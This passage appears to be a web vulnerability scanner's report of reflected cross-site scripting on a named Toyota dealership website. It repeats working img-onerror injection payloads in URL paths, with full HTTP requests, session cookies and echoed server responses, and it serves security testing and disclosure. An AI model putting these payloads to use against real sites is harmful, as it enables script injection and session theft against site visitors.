Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:01:40 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:01:41 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 04:01:41 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Doubl ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Tundra Double Cab 4x286b5b'><img src=a onerror=alert(1)>1329f066d0b'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 10501<img%20src%3da%20onerror%3dalert(1)>b7333d1e6cb was submitted in the REST URL parameter 2. This input was echoed as 10501<img src=a onerror=alert(1)>b7333d1e6cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Double%20Cab%204x210501<img%20src%3da%20onerror%3dalert(1)>b7333d1e6cb/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:03:17 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:03:17 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 04:03:18 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16359
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Doubl ...[SNIP]... <H1> Toyota Tundra Double Cab 4x210501<img src=a onerror=alert(1)>b7333d1e6cb</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9a11"><img%20src%3da%20onerror%3dalert(1)>3374b05f9e0 was submitted in the REST URL parameter 2. This input was echoed as d9a11"><img src=a onerror=alert(1)>3374b05f9e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Double%20Cab%204x2d9a11"><img%20src%3da%20onerror%3dalert(1)>3374b05f9e0/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:59:57 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:59:57 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:59:58 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Doubl ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Tundra Double Cab 4x2d9a11"><img src=a onerror=alert(1)>3374b05f9e0 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Tundra Double Cab 4x2d9a11"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8e984'><img%20src%3da%20onerror%3dalert(1)>84e099ee2f1 was submitted in the REST URL parameter 2. This input was echoed as 8e984'><img src=a onerror=alert(1)>84e099ee2f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Double%20Cab%204x48e984'><img%20src%3da%20onerror%3dalert(1)>84e099ee2f1/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:05:42 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:05:42 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 04:05:43 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Doubl ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Tundra Double Cab 4x48e984'><img src=a onerror=alert(1)>84e099ee2f1'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc7cf<img%20src%3da%20onerror%3dalert(1)>b86beae921f was submitted in the REST URL parameter 2. This input was echoed as fc7cf<img src=a onerror=alert(1)>b86beae921f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Double%20Cab%204x4fc7cf<img%20src%3da%20onerror%3dalert(1)>b86beae921f/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:06:59 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:06:59 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 04:07:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16328
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Doubl ...[SNIP]... <H1> Toyota Tundra Double Cab 4x4fc7cf<img src=a onerror=alert(1)>b86beae921f</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be5dd"><img%20src%3da%20onerror%3dalert(1)>8064afab7aa was submitted in the REST URL parameter 2. This input was echoed as be5dd"><img src=a onerror=alert(1)>8064afab7aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Double%20Cab%204x4be5dd"><img%20src%3da%20onerror%3dalert(1)>8064afab7aa/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:03:58 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:03:58 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 04:03:59 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Doubl ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Tundra Double Cab 4x4be5dd"><img src=a onerror=alert(1)>8064afab7aa at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Tundra Double Cab 4x4be5dd"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 71496'><img%20src%3da%20onerror%3dalert(1)>2adc2ce8e5c was submitted in the REST URL parameter 2. This input was echoed as 71496'><img src=a onerror=alert(1)>2adc2ce8e5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Regular%20Cab%204x271496'><img%20src%3da%20onerror%3dalert(1)>2adc2ce8e5c/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:08:01 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:08:01 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 04:08:02 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16385
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Regul ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Tundra Regular Cab 4x271496'><img src=a onerror=alert(1)>2adc2ce8e5c'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f678f"><img%20src%3da%20onerror%3dalert(1)>240d06d0898 was submitted in the REST URL parameter 2. This input was echoed as f678f"><img src=a onerror=alert(1)>240d06d0898 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Regular%20Cab%204x2f678f"><img%20src%3da%20onerror%3dalert(1)>240d06d0898/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:06:22 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:06:22 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 04:06:23 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16391
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Regul ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Tundra Regular Cab 4x2f678f"><img src=a onerror=alert(1)>240d06d0898 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Tundra Regular Cab 4x2f678f"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e04f4<img%20src%3da%20onerror%3dalert(1)>a29355770ba was submitted in the REST URL parameter 2. This input was echoed as e04f4<img src=a onerror=alert(1)>a29355770ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Regular%20Cab%204x2e04f4<img%20src%3da%20onerror%3dalert(1)>a29355770ba/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:09:26 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:09:26 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 04:09:27 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Regul ...[SNIP]... <H1> Toyota Tundra Regular Cab 4x2e04f4<img src=a onerror=alert(1)>a29355770ba</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c897b<img%20src%3da%20onerror%3dalert(1)>6a257a49a5 was submitted in the REST URL parameter 2. This input was echoed as c897b<img src=a onerror=alert(1)>6a257a49a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Regular%20Cab%204x4c897b<img%20src%3da%20onerror%3dalert(1)>6a257a49a5/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:07:50 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:07:50 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 04:07:51 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Regul ...[SNIP]... <H1> Toyota Tundra Regular Cab 4x4c897b<img src=a onerror=alert(1)>6a257a49a5</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c2543'><img%20src%3da%20onerror%3dalert(1)>fa5f642c83f was submitted in the REST URL parameter 2. This input was echoed as c2543'><img src=a onerror=alert(1)>fa5f642c83f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Regular%20Cab%204x4c2543'><img%20src%3da%20onerror%3dalert(1)>fa5f642c83f/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:06:05 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:06:05 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 04:06:06 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Regul ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Tundra Regular Cab 4x4c2543'><img src=a onerror=alert(1)>fa5f642c83f'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48ebb"><img%20src%3da%20onerror%3dalert(1)>35d841ff133 was submitted in the REST URL parameter 2. This input was echoed as 48ebb"><img src=a onerror=alert(1)>35d841ff133 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

GET /Toyota/Tundra%20Regular%20Cab%204x448ebb"><img%20src%3da%20onerror%3dalert(1)>35d841ff133/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:04:36 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:04:36 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 04:04:37 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Regul ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Tundra Regular Cab 4x448ebb"><img src=a onerror=alert(1)>35d841ff133 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Tundra Regular Cab 4x448ebb"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6d575<img%20src%3da%20onerror%3dalert(1)>24d756e20f2 was submitted in the REST URL parameter 2. This input was echoed as 6d575<img src=a onerror=alert(1)>24d756e20f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

GET /Toyota/Venza6d575<img%20src%3da%20onerror%3dalert(1)>24d756e20f2/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:07:58 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:07:59 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 04:07:59 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Venza6d575<i ...[SNIP]... <H1> Toyota Venza6d575<img src=a onerror=alert(1)>24d756e20f2</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41a84"><img%20src%3da%20onerror%3dalert(1)>ee000ae3822 was submitted in the REST URL parameter 2. This input was echoed as 41a84"><img src=a onerror=alert(1)>ee000ae3822 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

GET /Toyota/Venza41a84"><img%20src%3da%20onerror%3dalert(1)>ee000ae3822/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:04:51 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:04:51 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 04:04:52 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Venza41a84"> ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Venza41a84"><img src=a onerror=alert(1)>ee000ae3822 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Venza41a84"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7f40e'><img%20src%3da%20onerror%3dalert(1)>6fbc1bf8bf6 was submitted in the REST URL parameter 2. This input was echoed as 7f40e'><img src=a onerror=alert(1)>6fbc1bf8bf6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

GET /Toyota/Venza7f40e'><img%20src%3da%20onerror%3dalert(1)>6fbc1bf8bf6/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
